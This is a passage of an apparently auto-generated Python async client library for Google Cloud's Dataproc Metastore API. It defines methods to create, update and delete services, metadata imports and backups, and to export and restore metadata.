Required. The relative resource name of the location in
which to create a metastore service, in the following
form:
``projects/{project_number}/locations/{location_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
service (:class:`google.cloud.metastore_v1.types.Service`):
Required. The Metastore service to create. The ``name``
field is ignored. The ID of the created metastore
service must be provided in the request's ``service_id``
field.
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
service_id (:class:`str`):
Required. The ID of the metastore
service, which is used as the final
component of the metastore service's
name.
This value must be between 2 and 63
characters long inclusive, begin with a
letter, end with a letter or number, and
consist of alpha-numeric ASCII
characters or hyphens.
This corresponds to the ``service_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1.types.Service` A
managed metastore service that serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, service, service_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.CreateServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if service is not None:
request.service = service
if service_id is not None:
request.service_id = service_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_service,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
metastore.Service,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def update_service(
self,
request: Union[metastore.UpdateServiceRequest, dict] = None,
*,
service: metastore.Service = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Updates the parameters of a single service.
Args:
request (Union[google.cloud.metastore_v1.types.UpdateServiceRequest, dict]):
The request object. Request message for
[DataprocMetastore.UpdateService][google.cloud.metastore.v1.DataprocMetastore.UpdateService].
service (:class:`google.cloud.metastore_v1.types.Service`):
Required. The metastore service to update. The server
only merges fields in the service if they are specified
in ``update_mask``.
The metastore service's ``name`` field is used to
identify the metastore service to be updated.
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Required. A field mask used to specify the fields to be
overwritten in the metastore service resource by the
update. Fields specified in the ``update_mask`` are
relative to the resource (not to the full request). A
field is overwritten if it is in the mask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1.types.Service` A
managed metastore service that serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([service, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.UpdateServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if service is not None:
request.service = service
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_service,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("service.name", request.service.name),)
),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
metastore.Service,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def delete_service(
self,
request: Union[metastore.DeleteServiceRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a single service.
Args:
request (Union[google.cloud.metastore_v1.types.DeleteServiceRequest, dict]):
The request object. Request message for
[DataprocMetastore.DeleteService][google.cloud.metastore.v1.DataprocMetastore.DeleteService].
name (:class:`str`):
Required. The relative resource name of the metastore
service to delete, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.DeleteServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_service,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def list_metadata_imports(
self,
request: Union[metastore.ListMetadataImportsRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListMetadataImportsAsyncPager:
r"""Lists imports in a service.
Args:
request (Union[google.cloud.metastore_v1.types.ListMetadataImportsRequest, dict]):
The request object. Request message for
[DataprocMetastore.ListMetadataImports][google.cloud.metastore.v1.DataprocMetastore.ListMetadataImports].
parent (:class:`str`):
Required. The relative resource name of the service
whose metadata imports to list, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/metadataImports``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1.services.dataproc_metastore.pagers.ListMetadataImportsAsyncPager:
Response message for
[DataprocMetastore.ListMetadataImports][google.cloud.metastore.v1.DataprocMetastore.ListMetadataImports].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.ListMetadataImportsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_metadata_imports,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListMetadataImportsAsyncPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
async def get_metadata_import(
self,
request: Union[metastore.GetMetadataImportRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.MetadataImport:
r"""Gets details of a single import.
Args:
request (Union[google.cloud.metastore_v1.types.GetMetadataImportRequest, dict]):
The request object. Request message for
[DataprocMetastore.GetMetadataImport][google.cloud.metastore.v1.DataprocMetastore.GetMetadataImport].
name (:class:`str`):
Required. The relative resource name of the metadata
import to retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/metadataImports/{import_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1.types.MetadataImport:
A metastore resource that imports
metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.GetMetadataImportRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_metadata_import,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def create_metadata_import(
self,
request: Union[metastore.CreateMetadataImportRequest, dict] = None,
*,
parent: str = None,
metadata_import: metastore.MetadataImport = None,
metadata_import_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a new MetadataImport in a given project and
location.
Args:
request (Union[google.cloud.metastore_v1.types.CreateMetadataImportRequest, dict]):
The request object. Request message for
[DataprocMetastore.CreateMetadataImport][google.cloud.metastore.v1.DataprocMetastore.CreateMetadataImport].
parent (:class:`str`):
Required. The relative resource name of the service in
which to create a metastore import, in the following
form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
metadata_import (:class:`google.cloud.metastore_v1.types.MetadataImport`):
Required. The metadata import to create. The ``name``
field is ignored. The ID of the created metadata import
must be provided in the request's ``metadata_import_id``
field.
This corresponds to the ``metadata_import`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
metadata_import_id (:class:`str`):
Required. The ID of the metadata
import, which is used as the final
component of the metadata import's name.
This value must be between 1 and 64
characters long, begin with a letter,
end with a letter or number, and consist
of alpha-numeric ASCII characters or
hyphens.
This corresponds to the ``metadata_import_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1.types.MetadataImport`
A metastore resource that imports metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, metadata_import, metadata_import_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.CreateMetadataImportRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if metadata_import is not None:
request.metadata_import = metadata_import
if metadata_import_id is not None:
request.metadata_import_id = metadata_import_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_metadata_import,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
metastore.MetadataImport,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def update_metadata_import(
self,
request: Union[metastore.UpdateMetadataImportRequest, dict] = None,
*,
metadata_import: metastore.MetadataImport = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Updates a single import.
Only the description field of MetadataImport is
supported to be updated.
Args:
request (Union[google.cloud.metastore_v1.types.UpdateMetadataImportRequest, dict]):
The request object. Request message for
[DataprocMetastore.UpdateMetadataImport][google.cloud.metastore.v1.DataprocMetastore.UpdateMetadataImport].
metadata_import (:class:`google.cloud.metastore_v1.types.MetadataImport`):
Required. The metadata import to update. The server only
merges fields in the import if they are specified in
``update_mask``.
The metadata import's ``name`` field is used to identify
the metastore import to be updated.
This corresponds to the ``metadata_import`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Required. A field mask used to specify the fields to be
overwritten in the metadata import resource by the
update. Fields specified in the ``update_mask`` are
relative to the resource (not to the full request). A
field is overwritten if it is in the mask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1.types.MetadataImport`
A metastore resource that imports metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([metadata_import, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.UpdateMetadataImportRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if metadata_import is not None:
request.metadata_import = metadata_import
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_metadata_import,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("metadata_import.name", request.metadata_import.name),)
),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
metastore.MetadataImport,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def export_metadata(
self,
request: Union[metastore.ExportMetadataRequest, dict] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Exports metadata from a service.
Args:
request (Union[google.cloud.metastore_v1.types.ExportMetadataRequest, dict]):
The request object. Request message for
[DataprocMetastore.ExportMetadata][google.cloud.metastore.v1.DataprocMetastore.ExportMetadata].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1.types.MetadataExport`
The details of a metadata export operation.
"""
# Create or coerce a protobuf request object.
request = metastore.ExportMetadataRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.export_metadata,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("service", request.service),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
metastore.MetadataExport,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def restore_service(
self,
request: Union[metastore.RestoreServiceRequest, dict] = None,
*,
service: str = None,
backup: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Restores a service from a backup.
Args:
request (Union[google.cloud.metastore_v1.types.RestoreServiceRequest, dict]):
The request object. Request message for
[DataprocMetastore.Restore][].
service (:class:`str`):
Required. The relative resource name of the metastore
service to run restore, in the following form:
``projects/{project_id}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
backup (:class:`str`):
Required. The relative resource name of the metastore
service backup to restore from, in the following form:
``projects/{project_id}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.
This corresponds to the ``backup`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1.types.Restore` The
details of a metadata restore operation.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([service, backup])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.RestoreServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if service is not None:
request.service = service
if backup is not None:
request.backup = backup
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.restore_service,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("service", request.service),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
metastore.Restore,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def list_backups(
self,
request: Union[metastore.ListBackupsRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListBackupsAsyncPager:
r"""Lists backups in a service.
Args:
request (Union[google.cloud.metastore_v1.types.ListBackupsRequest, dict]):
The request object. Request message for
[DataprocMetastore.ListBackups][google.cloud.metastore.v1.DataprocMetastore.ListBackups].
parent (:class:`str`):
Required. The relative resource name of the service
whose backups to list, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/backups``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1.services.dataproc_metastore.pagers.ListBackupsAsyncPager:
Response message for
[DataprocMetastore.ListBackups][google.cloud.metastore.v1.DataprocMetastore.ListBackups].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.ListBackupsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_backups,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListBackupsAsyncPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
async def get_backup(
self,
request: Union[metastore.GetBackupRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.Backup:
r"""Gets details of a single backup.
Args:
request (Union[google.cloud.metastore_v1.types.GetBackupRequest, dict]):
The request object. Request message for
[DataprocMetastore.GetBackup][google.cloud.metastore.v1.DataprocMetastore.GetBackup].
name (:class:`str`):
Required. The relative resource name of the backup to
retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1.types.Backup:
The details of a backup resource.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.GetBackupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_backup,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def create_backup(
self,
request: Union[metastore.CreateBackupRequest, dict] = None,
*,
parent: str = None,
backup: metastore.Backup = None,
backup_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a new backup in a given project and location.
Args:
request (Union[google.cloud.metastore_v1.types.CreateBackupRequest, dict]):
The request object. Request message for
[DataprocMetastore.CreateBackup][google.cloud.metastore.v1.DataprocMetastore.CreateBackup].
parent (:class:`str`):
Required. The relative resource name of the service in
which to create a backup of the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
backup (:class:`google.cloud.metastore_v1.types.Backup`):
Required. The backup to create. The ``name`` field is
ignored. The ID of the created backup must be provided
in the request's ``backup_id`` field.
This corresponds to the ``backup`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
backup_id (:class:`str`):
Required. The ID of the backup, which
is used as the final component of the
backup's name.
This value must be between 1 and 64
characters long, begin with a letter,
end with a letter or number, and consist
of alpha-numeric ASCII characters or
hyphens.
This corresponds to the ``backup_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1.types.Backup` The
details of a backup resource.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, backup, backup_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.CreateBackupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if backup is not None:
request.backup = backup
if backup_id is not None:
request.backup_id = backup_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_backup,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
metastore.Backup,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def delete_backup(
self,
request: Union[metastore.DeleteBackupRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a single backup.
Args:
request (Union[google.cloud.metastore_v1.types.DeleteBackupRequest, dict]):
The request object. Request message for
[DataprocMetastore.DeleteBackup][google.cloud.metastore.v1.DataprocMetastore.DeleteBackup].
name (:class:`str`):
Required. The relative resource name of the backup to
delete, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.DeleteBackupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_backup,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-metastore",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("DataprocMetastoreAsyncClient",)
